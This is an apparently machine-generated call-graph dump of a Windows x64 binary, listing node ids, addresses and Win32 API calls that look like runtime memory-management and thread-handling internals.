SetLastError 15392->15393 15396 7ff65855c8ba RaiseFailFastException 15395->15396 15397 7ff65855c8c8 FlsSetValue 15395->15397 15396->15397 15401 7ff6585b1544 15398->15401 15400 7ff658553a2a 15400->15355 15402 7ff6585b155e malloc 15401->15402 15403 7ff6585b154f 15402->15403 15404 7ff6585b1568 15402->15404 15403->15402 15405 7ff6585b156e 15403->15405 15404->15400 15406 7ff6585b1579 15405->15406 15410 7ff6585b19a4 15405->15410 15414 7ff6585b19c4 15406->15414 15411 7ff6585b19b2 std::bad_alloc::bad_alloc 15410->15411 15418 7ff6585b26d0 15411->15418 15413 7ff6585b19c3 15415 7ff6585b19d2 std::bad_alloc::bad_alloc 15414->15415 15416 7ff6585b26d0 Concurrency::cancel_current_task 2 API calls 15415->15416 15417 7ff6585b157f 15416->15417 15417->15400 15419 7ff6585b26ef 15418->15419 15420 7ff6585b2718 RtlPcToFileHeader 15419->15420 15421 7ff6585b273a RaiseException 15419->15421 15422 7ff6585b2730 15420->15422 15421->15413 15422->15421 15432 7ff65855ecb0 15423->15432 15426 7ff6585b0c40 _swprintf_c_l 3 API calls 15427 7ff6585539ca 15426->15427 15427->15363 15429 7ff658603991 15428->15429 15436 7ff6585547e0 15429->15436 15433 7ff65855ecdc 15432->15433 15435 7ff6585539af 15432->15435 15434 7ff6585b0c40 _swprintf_c_l 3 API calls 15433->15434 15433->15435 15434->15435 15435->15426 15437 7ff65855489b 15436->15437 15442 7ff6585f5a60 15437->15442 15443 7ff6585f5a72 15442->15443 15446 7ff6585f5b20 15443->15446 15459 7ff6585572b0 15446->15459 15448 7ff6585f5b9f 15454 7ff6585f5c57 15448->15454 15479 7ff6585573f0 15448->15479 15449 7ff6585f5c8c 15491 7ff658553f20 15449->15491 15454->15449 15487 7ff6585f56e0 15454->15487 15460 7ff6585572fb 15459->15460 15461 7ff658557340 15460->15461 15462 7ff658557300 15460->15462 15464 7ff65855735a 15461->15464 15466 7ff65855e7d0 4 API calls 15461->15466 15463 7ff65855731a 15462->15463 15494 7ff65855e7d0 15462->15494 15500 7ff658556700 15463->15500 15467 7ff65855738b 15464->15467 15468 7ff658557376 15464->15468 15466->15464 15471 7ff658556eb0 2 API calls 15467->15471 15470 7ff658556eb0 2 API calls 15468->15470 15473 7ff658557382 15470->15473 15471->15473 15475 7ff65855733e 15473->15475 15476 7ff65855e7d0 4 API calls 15473->15476 15477 7ff6585573c2 15475->15477 15513 7ff658556090 15475->15513 15476->15475 15477->15448 15480 7ff658557432 15479->15480 15542 7ff658556aa0 15480->15542 15482 7ff658557441 15483 7ff658557462 15482->15483 15484 7ff65855e7d0 4 API calls 15482->15484 15485 7ff658557473 15483->15485 15486 7ff658556090 2 API calls 15483->15486 15484->15483 15485->15448 15486->15485 15488 7ff6585f5714 15487->15488 15571 7ff658553c90 15488->15571 15490 7ff6585f5751 15490->15449 15492 7ff658553f48 RaiseFailFastException 15491->15492 15493 7ff658553f55 15491->15493 15492->15493 15495 7ff65855e87c 15494->15495 15497 7ff65855e80b 15494->15497 15495->15463 15497->15495 15499 7ff65855e844 15497->15499 15519 7ff65855e4f0 15497->15519 15499->15495 15527 7ff65855e890 15499->15527 15502 7ff65855671d _swprintf_c_l 15500->15502 15501 7ff6585568e1 15508 7ff658556eb0 15501->15508 15502->15501 15503 7ff6585568c0 15502->15503 15504 7ff6585568b8 15502->15504 15505 7ff6585568a9 RaiseFailFastException 15502->15505 15503->15501 15507 7ff65855e7d0 4 API calls 15503->15507 15536 7ff6585570f0 15504->15536 15505->15503 15507->15501 15509 7ff658556f10 15508->15509 15510 7ff658556ec2 15508->15510 15509->15475 15510->15509 15511 7ff658556090 2 API calls 15510->15511 15512 7ff658556eeb 15511->15512 15512->15475 15514 7ff6585560b0 15513->15514 15515 7ff6585560a8 15513->15515 15514->15477 15515->15514 15516 7ff658556126 15515->15516 15517 7ff658556119 RaiseFailFastException 15515->15517 15516->15514 15518 7ff658556141 RaiseFailFastException 15516->15518 15517->15516 15518->15514 15520 7ff65855e514 15519->15520 15521 7ff6585b0c40 _swprintf_c_l 3 API calls 15520->15521 15525 7ff65855e5af 15520->15525 15522 7ff65855e584 15521->15522 15523 7ff65855e63c 15522->15523 15524 7ff6585b0c40 _swprintf_c_l 3 API calls 15522->15524 15523->15499 15524->15525 15525->15523 15531 7ff65855ca30 GetCurrentThreadId 15525->15531 15528 7ff65855e8ca 15527->15528 15530 7ff65855e8f4 15528->15530 15532 7ff65855e320 15528->15532 15530->15495 15531->15523 15534 7ff65855e34a _swprintf_c_l 15532->15534 15533 7ff65855e371 15533->15530 15534->15533 15535 7ff6585b0c40 _swprintf_c_l 3 API calls 15534->15535 15535->15533 15540 7ff658557103 15536->15540 15537 7ff658557271 15537->15503 15538 7ff658557243 RaiseFailFastException 15538->15540 15539 7ff6585571c2 RaiseFailFastException 15539->15540 15540->15537 15540->15538 15540->15539 15541 7ff6585571d8 RaiseFailFastException 15540->15541 15541->15540 15547 7ff658556ada 15542->15547 15543 7ff658556b50 RaiseFailFastException 15543->15547 15544 7ff658556dc8 15545 7ff658556700 8 API calls 15544->15545 15549 7ff658556dce 15544->15549 15545->15549 15546 7ff658556e9a 15546->15482 15547->15543 15547->15544 15548 7ff658556e1c 15547->15548 15547->15549 15550 7ff658556e0d RaiseFailFastException 15547->15550 15552 7ff658556ca4 RaiseFailFastException 15547->15552 15555 7ff658556090 2 API calls 15547->15555 15557 7ff658556d7b RaiseFailFastException 15547->15557 15558 7ff658556d91 RaiseFailFastException 15547->15558 15559 7ff65855e7d0 4 API calls 15547->15559 15560 7ff658556320 15547->15560 15551 7ff6585570f0 3 API calls 15548->15551 15549->15546 15553 7ff658556090 2 API calls 15549->15553 15550->15549 15551->15549 15552->15547 15556 7ff658556e73 15553->15556 15555->15547 15556->15482 15557->15547 15558->15547 15559->15547 15561 7ff65855634d 15560->15561 15562 7ff658556377 15560->15562 15564 7ff65855e7d0 4 API calls 15561->15564 15563 7ff6585564e6 15562->15563 15565 7ff6585563a4 15562->15565 15566 7ff6585564ec RaiseFailFastException 15563->15566 15567 7ff6585564f9 15563->15567 15564->15562 15569 7ff658556090 2 API calls 15565->15569 15566->15567 15568 7ff658556090 2 API calls 15567->15568 15570 7ff6585564d1 15568->15570 15569->15570 15570->15547 15572 7ff658553caa _swprintf_c_l 15571->15572 15575 7ff65855cfc0 RtlCaptureContext 15572->15575 15576 7ff6585b0c20 8 API calls 15575->15576 15577 7ff658553cb9 15576->15577 15577->15490 15579 7ff658554390 26 API calls 15578->15579 15582 7ff658602c66 15579->15582 15580 7ff658602d6f 15580->15374 15582->15580 15583 7ff658551f50 15582->15583 15584 7ff658551f96 15583->15584 15587 7ff658551cb0 15584->15587 15586 7ff658551fa6 15586->15582 15588 7ff658551ce0 15587->15588 15589 7ff658551d78 15588->15589 15592 7ff65856899b 15588->15592 15608 7ff658568939 15588->15608 15589->15586 15594 7ff6585689bc 15592->15594 15593 7ff658568a25 15612 7ff658593070 15593->15612 15594->15593 15597 7ff6585689fe GetTickCount64 15594->15597 15601 7ff658568aa7 15594->15601 15597->15593 15606 7ff658568a12 15597->15606 15599 7ff658568a49 15599->15601 15603 7ff658568970 15599->15603 15604 7ff658568a83 GetTickCount64 15599->15604 15601->15603 15626 7ff65856ed80 15601->15626 15602 7ff658568b09 15607 7ff6585688fa 15602->15607 15632 7ff65856b470 15602->15632 15622 7ff658593140 15603->15622 15604->15601 15604->15606 15606->15601 15607->15589 15609 7ff65856893d 15608->15609 15611 7ff6585688fa 15608->15611 15610 7ff65856b470 3 API calls 15609->15610 15609->15611 15610->15611 15611->15589 15613 7ff658593090 15612->15613 15614 7ff65859312a 15612->15614 15639 7ff658562140 15613->15639 15614->15599 15617 7ff65859311a 15617->15599 15623 7ff658593156 15622->15623 15624 7ff65859318d 15623->15624 15660 7ff658562cf0 WaitForSingleObject 15623->15660 15624->15603 15627 7ff65856edb7 15626->15627 15629 7ff658568ae3 15626->15629 15628 7ff658562990 SleepEx 15627->15628 15627->15629 15630 7ff65856edf5 15628->15630 15629->15602 15629->15603 15629->15607 15630->15629 15631 7ff65857c120 3 API calls 15630->15631 15631->15629 15634 7ff65856b4a2 15632->15634 15637 7ff65856b513 15632->15637 15633 7ff65856b4e6 SwitchToThread 15633->15634 15634->15633 15635 7ff658562990 SleepEx 15634->15635 15634->15637 15635->15634 15636 7ff65856b5f5 15636->15607 15637->15636 15638 7ff65856b5f0 DebugBreak 15637->15638 15638->15636 15640 7ff658562177 GetCurrentProcess 15639->15640 15641 7ff65856222f GlobalMemoryStatusEx 15639->15641 15642 7ff658562190 15640->15642 15643 7ff658562198 15641->15643 15642->15641 15642->15643 15644 7ff6585b0c20 8 API calls 15643->15644 15645 7ff658562308 15644->15645 15645->15617 15646 7ff6585683d0 15645->15646 15647 7ff6585683e8 15646->15647 15656 7ff658562cf0 WaitForSingleObject 15647->15656 15661 7ff6586001c0 15662 7ff6586001d5 15661->15662 15663 7ff658554390 26 API calls 15662->15663 15664 7ff6586001eb 15663->15664 15667 7ff6585fd320 15664->15667 15668 7ff6585fd34d 15667->15668 15671 7ff6586433b0 15668->15671 15670 7ff6585fd373 15672 7ff6586433df 15671->15672 15673 7ff658643493 15672->15673 15676 7ff6586434a4 15672->15676 15677 7ff6586437e0 15672->15677 15688 7ff658643700 15673->15688 15676->15670 15683 7ff65864380a 15677->15683 15678 7ff6586438e5 15681 7ff658554390 26 API calls 15678->15681 15680 7ff6586438d9 15680->15678 15685 7ff6586438e0 15680->15685 15682 7ff6586438ff 15681->15682 15684 7ff658554390 26 API calls 15682->15684 15683->15678 15687 7ff658643911 15683->15687 15692 7ff6585f4540 15683->15692 15684->15687 15686 7ff6585547e0 26 API calls 15685->15686 15686->15687 15687->15673 15689 7ff658643740 15688->15689 15690 7ff65864376a 15688->15690 15697 7ff65864a110 15689->15697 15690->15676 15693 7ff6585f45c9 15692->15693 15695 7ff6585f454c 15692->15695 15693->15692 15694 7ff6585547e0 26 API calls 15693->15694 15696 7ff6585f4609 15693->15696 15694->15693 15695->15680 15696->15680 15698 7ff6585f4c50 26 API calls 15697->15698 15699 7ff65864a12f 15698->15699 15699->15690 15700 7ff658583480 15701 7ff6585834bd 15700->15701 15703 7ff6585834e7 15700->15703 15702 7ff658562140 10 API calls 15701->15702 15702->15703 15704 7ff658557d00 15734 7ff65855ccc0 FlsAlloc 15704->15734 15706 7ff658557e96 15707 7ff658557d0f 15707->15706 15747 7ff65855ca50 GetModuleHandleExW 15707->15747 15709 7ff658557d38 15748 7ff6585552e0 15709->15748 15711 7ff658557d40 15711->15706 15756 7ff65855dbe0 15711->15756 15715 7ff658557d76 15715->15706 15716 7ff658557d99 RtlAddVectoredExceptionHandler 15715->15716 15717 7ff658557dac 15716->15717 15718 7ff658557db2 15716->15718 15720 7ff658557de7 15717->15720 15721 7ff65855df30 8 API calls 15717->15721 15782 7ff65855df30 15718->15782 15722 7ff658557e3e 15720->15722 15765 7ff65855e6d0 15720->15765 15721->15720 15773 7ff658551df0 15722->15773 15725 7ff658557e43 15725->15706 15785 7ff658561c50 15725->15785 15728 7ff658557e88 15791 7ff658561000 15728->15791 15729 7ff658557e6f 15730 7ff65855ce20 2 API calls 15729->15730 15732 7ff658557e7b RaiseFailFastException 15730->15732 15732->15728 15735 7ff65855ce0e 15734->15735 15736 7ff65855cce0 15734->15736 15735->15707 15795 7ff658563ac0 15736->15795 15741 7ff65855df30 8 API calls 15742 7ff65855cd12 15741->15742 15743 7ff65855cd3d GetCurrentProcess GetProcessAffinityMask 15742->15743 15745 7ff65855cd34 15742->15745 15746 7ff65855cda8 15742->15746 15743->15745 15744 7ff65855cd84 QueryInformationJobObject 15744->15746 15745->15744 15746->15707 15747->15709 15749 7ff6585b0c40 _swprintf_c_l 3 API calls 15748->15749 15750 7ff6585552f5 15749->15750 15751 7ff658555334 15750->15751 15981 7ff658560cc0 15750->15981 15751->15711 15753 7ff658555302 15753->15751 15984 7ff658560ca0 15753->15984 15757 7ff658560ca0 InitializeCriticalSectionEx 15756->15757 15758 7ff658557d66 15757->15758 15758->15706 15759 7ff6585536d0 15758->15759 15760 7ff6585b0c40 _swprintf_c_l 3 API calls 15759->15760 15761 7ff6585536ee 15760->15761 15762 7ff65855378a 15761->15762 15986 7ff6585576b0 15761->15986 15762->15715 15764 7ff658553720 15764->15715 15766 7ff65855e6fb 15765->15766 15767 7ff65855e7a6 15765->15767 15768 7ff6585b0c40 _swprintf_c_l 3 API calls 15766->15768 15767->15722 15769 7ff65855e71a 15768->15769 15770 7ff658560ca0 InitializeCriticalSectionEx 15769->15770 15771 7ff65855e745 15770->15771 15772 7ff65855e78e GetSystemTimeAsFileTime 15771->15772 15772->15767 15774 7ff658551e3c 15773->15774 15777 7ff658551e36 15773->15777 15775 7ff65855df30 8 API calls 15774->15775 15775->15777 15776 7ff658551eb3 15776->15725 15777->15776 15991 7ff6585540f0 15777->15991 15779 7ff658551e98 15779->15776 15998 7ff65855f700 15779->15998 15780 7ff658551ea8 15780->15725 16028 7ff65855e140 15782->16028 15784 7ff65855df58 15784->15717 15786 7ff658561c99 15785->15786 15790 7ff658557e5b 15785->15790 15787 7ff658561cef GetEnabledXStateFeatures 15786->15787 15786->15790 15788 7ff658561d00 15787->15788 15787->15790 15789 7ff658561d46 GetEnabledXStateFeatures 15788->15789 15788->15790 15789->15790 15790->15728 15790->15729 15792 7ff65856101a _swprintf_c_l 15791->15792 16032 7ff65855ca50 GetModuleHandleExW 15792->16032 15794 7ff658557e8d 15943 7ff65855d6d0 15795->15943 15797 7ff658563ade 15798 7ff65855d6d0 8 API calls 15797->15798 15799 7ff658563b0b 15798->15799 15800 7ff65855d6d0 8 API calls 15799->15800 15801 7ff658563b33 15800->15801 15802 7ff65855d6d0 8 API calls 15801->15802 15803 7ff658563b5b 15802->15803 15804 7ff65855d6d0 8 API calls 15803->15804 15805 7ff658563b88 15804->15805 15806 7ff65855d6d0 8 API calls 15805->15806 15807 7ff658563bb0 15806->15807 15808 7ff65855d6d0 8 API calls 15807->15808 15809 7ff658563bdd 15808->15809 15810 7ff65855d6d0 8 API calls 15809->15810 15811 7ff658563c05 15810->15811 15812 7ff65855d6d0 8 API calls 15811->15812 15813 7ff658563c2d 15812->15813 15814 7ff65855d6d0 8 API calls 15813->15814 15815 7ff658563c55 15814->15815 15816 7ff65855d6d0 8 API calls 15815->15816 15817 7ff658563c82 15816->15817 15818 7ff65855d6d0 8 API calls 15817->15818 15819 7ff658563caf 15818->15819 15948 7ff65855d7a0 15819->15948 15822 7ff65855d7a0 18 API calls 15823 7ff658563d00 15822->15823 15824 7ff65855d7a0 18 API calls 15823->15824 15825 7ff658563d2e 15824->15825 15826 7ff65855d7a0 18 API calls 15825->15826 15827 7ff658563d57 15826->15827 15828 7ff65855d7a0 18 API calls 15827->15828 15829 7ff658563d80 15828->15829 15830 7ff65855d7a0 18 API calls 15829->15830 15831 7ff658563dae 15830->15831 15832 7ff65855d7a0 18 API calls 15831->15832 15833 7ff658563ddc 15832->15833 15834 7ff65855d7a0 18 API calls 15833->15834 15835 7ff658563e05 15834->15835 15836 7ff65855d7a0 18 API calls 15835->15836 15837 7ff658563e2e 15836->15837 15838 7ff65855d7a0 18 API calls 15837->15838 15839 7ff658563e57 15838->15839 15840 7ff65855d7a0 18 API calls 15839->15840 15841 7ff658563e80 15840->15841 15842 7ff65855d7a0 18 API calls 15841->15842 15843 7ff658563ea9 15842->15843 15844 7ff65855d7a0 18 API calls 15843->15844 15845 7ff658563ed2 15844->15845 15846 7ff65855d7a0 18 API calls 15845->15846 15847 7ff658563f00 15846->15847 15848 7ff65855d7a0 18 API calls 15847->15848 15849 7ff658563f2e 15848->15849 15850 7ff65855d7a0 18 API calls 15849->15850 15851 7ff658563f57 15850->15851 15852 7ff65855d7a0 18 API calls 15851->15852 15853 7ff658563f80 15852->15853 15854 7ff65855d7a0 18 API calls 15853->15854 15855 7ff658563fa9 15854->15855 15856 7ff65855d7a0 18 API calls 15855->15856 15857 7ff658563fd2 15856->15857 15858 7ff65855d7a0 18 API calls 15857->15858 15859 7ff658564000 15858->15859 15860 7ff65855d7a0 18 API calls 15859->15860 15861 7ff65856402e 15860->15861 15862 7ff65855d7a0 18 API calls 15861->15862 15863 7ff658564057 15862->15863 15864 7ff65855d7a0 18 API calls 15863->15864 15865 7ff658564080 15864->15865 15866 7ff65855d7a0 18 API calls 15865->15866 15867 7ff6585640a9 15866->15867 15868 7ff65855d7a0 18 API calls 15867->15868 15869 7ff6585640d2 15868->15869 15870 7ff65855d7a0 18 API calls 15869->15870 15871 7ff6585640fb 15870->15871 15872 7ff65855d7a0 18 API calls 15871->15872 15873 7ff658564124 15872->15873 15874 7ff65855d7a0 18 API calls 15873->15874 15875 7ff65856414d 15874->15875 15876 7ff65855d7a0 18 API calls 15875->15876 15877 7ff658564176 15876->15877 15878 7ff65855d7a0 18 API calls 15877->15878 15879 7ff65856419f 15878->15879 15880 7ff65855d7a0 18 API calls 15879->15880 15881 7ff6585641c8 15880->15881 15882 7ff65855d7a0 18 API calls 15881->15882 15883 7ff6585641f1 15882->15883 15884 7ff65855d7a0 18 API calls 15883->15884 15885 7ff65856421a 15884->15885 15886 7ff65855d7a0 18 API calls 15885->15886 15887 7ff658564243 15886->15887 15888 7ff65855d7a0 18 API calls 15887->15888 15889 7ff65856426c 15888->15889 15890 7ff65855d7a0 18 API calls 15889->15890 15891 7ff658564295 15890->15891 15892 7ff65855d7a0 18 API calls 15891->15892 15893 7ff6585642be 15892->15893 15894 7ff65855d7a0 18 API calls 15893->15894 15895 7ff6585642e7 15894->15895 15896 7ff65855d7a0 18 API calls 15895->15896 15897 7ff658564310 15896->15897 15898 7ff65855d7a0 18 API calls 15897->15898 15899 7ff658564339 15898->15899 15900 7ff65855d7a0 18 API calls 15899->15900 15901 7ff658564362 15900->15901 15902 7ff65855d7a0 18 API calls 15901->15902 15903 7ff65856438b 15902->15903 15904 7ff65855d7a0 18 API calls 15903->15904 15905 7ff6585643b4 15904->15905 15906 7ff65855d7a0 18 API calls 15905->15906 15907 7ff6585643dd 15906->15907 15908 7ff65855d7a0 18 API calls 15907->15908 15909 7ff65856440b 15908->15909 15910 7ff65855d7a0 18 API calls 15909->15910 15911 7ff658564439 15910->15911 15912 7ff65855d7a0 18 API calls 15911->15912 15913 7ff658564467 15912->15913 15914 7ff65855d7a0 18 API calls 15913->15914 15915 7ff658564495 15914->15915 15916 7ff65855d7a0 18 API calls 15915->15916 15917 7ff6585644c3 15916->15917 15918 7ff65855d7a0 18 API calls 15917->15918 15919 7ff6585644f1 15918->15919 15920 7ff65855d7a0 18 API calls 15919->15920 15921 7ff65856451a 15920->15921 15922 7ff65855d7a0 18 API calls 15921->15922 15923 7ff658564548 15922->15923 15924 7ff65855d7a0 18 API calls 15923->15924 15925 7ff658564571 15924->15925 15926 7ff65855d7a0 18 API calls 15925->15926 15927 7ff65856459a 15926->15927 15928 7ff65855d7a0 18 API calls 15927->15928 15929 7ff6585645c8 15928->15929 15930 7ff65855d7a0 18 API calls 15929->15930 15931 7ff65855cce5 15930->15931 15932 7ff658562760 GetSystemInfo 15931->15932 15933 7ff6585627a4 15932->15933 15934 7ff6585627a8 GetNumaHighestNodeNumber 15933->15934 15935 7ff6585627ce GetCurrentProcess GetProcessGroupAffinity 15933->15935 15934->15935 15936 7ff6585627b7 15934->15936 15937 7ff6585627f9 GetLastError 15935->15937 15938 7ff658562804 15935->15938 15936->15935 15937->15938 15939 7ff658562826 15938->15939 15975 7ff658562540 GetLogicalProcessorInformationEx 15938->15975 15941 7ff658562890 GetCurrentProcess GetProcessAffinityMask 15939->15941 15942 7ff65855ccea 15939->15942 15941->15942 15942->15735 15942->15741 15944 7ff65855d6f4 15943->15944 15945 7ff65855d6f8 15944->15945 15946 7ff65855df30 8 API calls 15944->15946 15945->15797 15947 7ff65855d724 15946->15947 15947->15797 15949 7ff65855d7ca 15948->15949 15950 7ff65855d8df 15948->15950 15952 7ff65855d7d7 strcmp 15949->15952 15953 7ff65855d7ef 15949->15953 15951 7ff65855df30 8 API calls 15950->15951 15954 7ff65855d8f6 15951->15954 15952->15953 15959 7ff65855d7e7 15952->15959 15955 7ff65855d7fc strcmp 15953->15955 15956 7ff65855d80f 15953->15956 15954->15959 15970 7ff65855e0b0 15954->15970 15955->15956 15955->15959 15957 7ff65855d81c strcmp 15956->15957 15958 7ff65855d82f 15956->15958 15957->15958 15957->15959 15960 7ff65855d83c strcmp 15958->15960 15961 7ff65855d84f 15958->15961 15959->15822 15960->15959 15960->15961 15963 7ff65855d85c strcmp 15961->15963 15964 7ff65855d873 15961->15964 15963->15959 15963->15964 15965 7ff65855d897 15964->15965 15966 7ff65855d880 strcmp 15964->15966 15967 7ff65855d8bb 15965->15967 15968 7ff65855d8a4 strcmp 15965->15968 15966->15959 15966->15965 15967->15950 15969 7ff65855d8c8 strcmp 15967->15969 15968->15959 15968->15967 15969->15950 15969->15959 15971 7ff65855e0d4 15970->15971 15972 7ff65855e0fe 15970->15972 15971->15972 15973 7ff65855e0e0 _stricmp 15971->15973 15972->15959 15973->15971 15974 7ff65855e115 strtoull 15973->15974 15974->15972 15976 7ff65856272c 15975->15976 15977 7ff658562572 GetLastError 15975->15977 15976->15939 15977->15976 15978 7ff658562581 15977->15978 15978->15976 15979 7ff65856259d GetLogicalProcessorInformationEx 15978->15979 15980 7ff6585625c0 15979->15980 15980->15939 15982 7ff658560ca0 InitializeCriticalSectionEx 15981->15982 15983 7ff658560cfe 15982->15983 15983->15753 15985 7ff6585b08bd InitializeCriticalSectionEx 15984->15985 15987 7ff6585b0c40 _swprintf_c_l 3 API calls 15986->15987 15988 7ff6585576ce 15987->15988 15989 7ff658560ca0 InitializeCriticalSectionEx 15988->15989 15990 7ff658557700 15988->15990 15989->15990 15990->15764 15992 7ff658554102 15991->15992 15993 7ff65855413d 15992->15993 16005 7ff658560b30 CreateEventW 15992->16005 15993->15779 15995 7ff658554114 15995->15993 16006 7ff65855cf20 CreateThread 15995->16006 15997 7ff658554133 15997->15779 15999 7ff65855f717 15998->15999 16000 7ff65855f71f 15999->16000 16001 7ff6585b0c40 _swprintf_c_l 3 API calls 15999->16001 16000->15780 16003 7ff65855f751 16001->16003 16004 7ff65855f7e5 16003->16004 16009 7ff6585653b0 16003->16009 16004->15780 16005->15995 16007 7ff65855cf55 SetThreadPriority ResumeThread FindCloseChangeNotification 16006->16007 16008 7ff65855cf4f 16006->16008 16007->15997 16008->15997 16010 7ff6585653e3 _swprintf_c_l 16009->16010 16014 7ff658565409 _swprintf_c_l 16010->16014 16015 7ff6585664f0 16010->16015 16012 7ff658565400 16013 7ff658560ca0 InitializeCriticalSectionEx 16012->16013 16012->16014 16013->16014 16014->16003 16014->16014 16024 7ff658562ab0 16015->16024 16017 7ff658566512 16018 7ff65856651a 16017->16018 16019 7ff6585629e0 3 API calls 16017->16019 16018->16012 16020 7ff658566538 16019->16020 16023 7ff658566543 _swprintf_c_l 16020->16023 16027 7ff658562a90 VirtualFree 16020->16027 16022 7ff65856665e 16022->16012 16023->16012 16025 7ff658562ad5 VirtualAlloc 16024->16025 16026 7ff658562af4 GetCurrentProcess VirtualAllocExNuma 16024->16026 16025->16026 16026->16017 16027->16022 16031 7ff65855e176 16028->16031 16029 7ff6585b0c20 8 API calls 16030 7ff65855e21a 16029->16030 16030->15784 16031->16029 16032->15794 16033 7ff65856c75f 16034 7ff65856c764 16033->16034 16041 7ff658591540 16034->16041 16036 7ff65856c86d 16037 7ff65856c898 16036->16037 16049 7ff658584530 16036->16049 16053 7ff658573ff0 16037->16053 16040 7ff65856c902 16042 7ff658591559 16041->16042 16043 7ff658591569 16041->16043 16042->16036 16044 7ff6585916ab SwitchToThread 16043->16044 16045 7ff6585915b9 SwitchToThread 16043->16045 16046 7ff6585916b7 16043->16046 16047 7ff658591660 SwitchToThread 16043->16047 16048 7ff658591676 SwitchToThread 16043->16048 16044->16043 16045->16043 16046->16036 16047->16043 16048->16043 16050 7ff65858454e 16049->16050 16052 7ff6585845b9 _swprintf_c_l 16049->16052 16050->16052 16058 7ff658562c80 VirtualAlloc 16050->16058 16052->16037 16054 7ff658584530 2 API calls 16053->16054 16055 7ff658574025 _swprintf_c_l 16054->16055 16056 7ff658591540 4 API calls 16055->16056 16057 7ff658574175 16056->16057 16057->16040 16057->16057 16059 7ff658562cbb 16058->16059 16060 7ff658562ccc 16058->16060 16059->16060 16061 7ff658562cc0 VirtualUnlock 16059->16061 16060->16052 16061->16060 16062 7ff658560d20 16063 7ff658560d3e 16062->16063 16064 7ff658560de1 16063->16064 16070 7ff65855cf90 VirtualAlloc 16063->16070 16071 7ff658569d8d 16072 7ff658569d99 16071->16072 16087 7ff65857c090 16072->16087 16075 7ff658569dcd 16091 7ff658562930 QueryPerformanceCounter 16075->16091 16078 7ff658569dee 16092 7ff65855daf0 16078->16092 16080 7ff658569f4d 16081 7ff65857c090 SwitchToThread 16080->16081 16083 7ff658569fd5 16081->16083 16082 7ff658562930 QueryPerformanceCounter 16082->16080 16085 7ff658562980 SetEvent 16083->16085 16086 7ff658569ff8 16083->16086 16084 7ff658569e3e 16084->16080 16084->16082 16085->16086 16088 7ff658569daf 16087->16088 16089 7ff65857c0af 16087->16089 16088->16075 16096 7ff658562970 ResetEvent 16088->16096 16089->16088 16090 7ff65857c0f1 SwitchToThread 16089->16090 16090->16089 16091->16078 16093 7ff65855dafd 16092->16093 16097 7ff658557b00 16093->16097 16098 7ff658557b42 16097->16098 16099 7ff658557b66 FlushProcessWriteBuffers 16098->16099 16101 7ff658557b83 16099->16101 16100 7ff658557c69 16101->16100 16103 7ff658557bf9 SwitchToThread 16101->16103 16104 7ff658552c00 16101->16104 16103->16101 16105 7ff658552c27 16104->16105 16106 7ff658552c07 16104->16106 16105->16101 16106->16105 16107 7ff65855cac1 LoadLibraryExW GetProcAddress 16106->16107 16120 7ff65855cbc4 16106->16120 16108 7ff65855cbad GetProcAddress 16107->16108 16109 7ff65855caf5 GetCurrentProcess 16107->16109 16108->16120 16117 7ff65855cb0a _swprintf_c_l 16109->16117 16110 7ff65855cc25 SuspendThread 16111 7ff65855cc89 16110->16111 16112 7ff65855cc33 GetThreadContext 16110->16112 16113 7ff6585b0c20 8 API calls 16111->16113 16114 7ff65855cc53 16112->16114 16115 7ff65855cc80 ResumeThread 16112->16115 16116 7ff65855cc99 16113->16116 16114->16115 16115->16111 16116->16101 16117->16108 16118 7ff65855cb41 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 16117->16118 16118->16108 16119 7ff65855cc19 16118->16119 16119->16110 16119->16111 16120->16110 16120->16111 16121 7ff65855cc0e GetLastError 16120->16121 16121->16119 16122 7ff65856f54d 16125 7ff6585916f0 16122->16125 16124 7ff65856f52b 16128 7ff65856c260 16125->16128 16127 7ff65859172a 16127->16124 16129 7ff65856c2aa 16128->16129 16130 7ff658591540 4 API calls 16129->16130 16134 7ff65856c381 16129->16134 16135 7ff65856c3bb _swprintf_c_l 16130->16135 16131 7ff658584530 2 API calls 16132 7ff65856c5a3 16131->16132 16133 7ff658573ff0 6 API calls 16132->16133 16132->16134 16133->16134 16134->16127 16135->16131 16135->16132 16136 7ff658555f12 16137 7ff658555f20 16136->16137 16140 7ff6585f4ce0 16137->16140 16138 7ff658560fb7 16141 7ff6585f4cf9 16140->16141 16144 7ff6585f4de0 16141->16144 16143 7ff6585f4d09 16143->16138 16145 7ff6585f4e19 16144->16145 16147 7ff6585f4df6 16144->16147 16149 7ff6585f4e80 16145->16149 16147->16143 16148 7ff6585f4e2d 16148->16143 16152 7ff6585f4ea2 16149->16152 16150 7ff6585f4fe6 16153 7ff6585547e0 26 API calls 16150->16153 16151 7ff6585f4f02 16151->16148 16152->16150 16152->16151 16154 7ff6585547e0 26 API calls 16152->16154 16155 7ff6585f4ff9 16153->16155 16154->16150 16156 7ff65856b310 16157 7ff65856b31b 16156->16157 16158 7ff65856b320 16157->16158 16159 7ff65855daf0 22 API calls 16157->16159 16160 7ff65856b359 16159->16160 16165 7ff658562320 16160->16165 16164 7ff65856b3b7 16166 7ff658562354 GetCurrentProcess IsProcessInJob 16165->16166 16167 7ff658562351 16165->16167 16168 7ff65856237a 16166->16168 16169 7ff65856242f 16166->16169 16167->16166 16168->16169 16170 7ff658562384 QueryInformationJobObject 16168->16170 16171 7ff658562436 GlobalMemoryStatusEx 16169->16171 16172 7ff65856245f 16169->16172 16170->16169 16173 7ff6585623aa 16170->16173 16171->16172 16174 7ff65856247d GlobalMemoryStatusEx 16172->16174 16176 7ff658562470 16172->16176 16173->16169 16175 7ff6585623f3 GlobalMemoryStatusEx 16173->16175 16174->16176 16175->16169 16177 7ff6585b0c20 8 API calls 16176->16177 16178 7ff6585624bf 16177->16178 16179 7ff658564610 16178->16179 16180 7ff65855d7a0 18 API calls 16179->16180 16181 7ff65856462e 16180->16181 16182 7ff65855d7a0 18 API calls 16181->16182 16183 7ff658564656 16182->16183 16184 7ff65855d7a0 18 API calls 16183->16184 16185 7ff65856467e 16184->16185 16186 7ff65855d7a0 18 API calls 16185->16186 16187 7ff6585646a6 16186->16187 16188 7ff65855d7a0 18 API calls 16187->16188 16189 7ff6585646ce 16188->16189 16190 7ff65855d7a0 18 API calls 16189->16190 16191 7ff6585646f6 16190->16191 16192 7ff65855d7a0 18 API calls 16191->16192 16193 7ff65856471e 16192->16193 16194 7ff65855d7a0 18 API calls 16193->16194 16195 7ff658564746 16194->16195 16195->16164 16196 7ff658582670 16197 7ff65858268d 16196->16197 16218 7ff6585629a0 VirtualAlloc 16197->16218 16199 7ff6585826b3 16221 7ff658562740 InitializeCriticalSection 16199->16221 16201 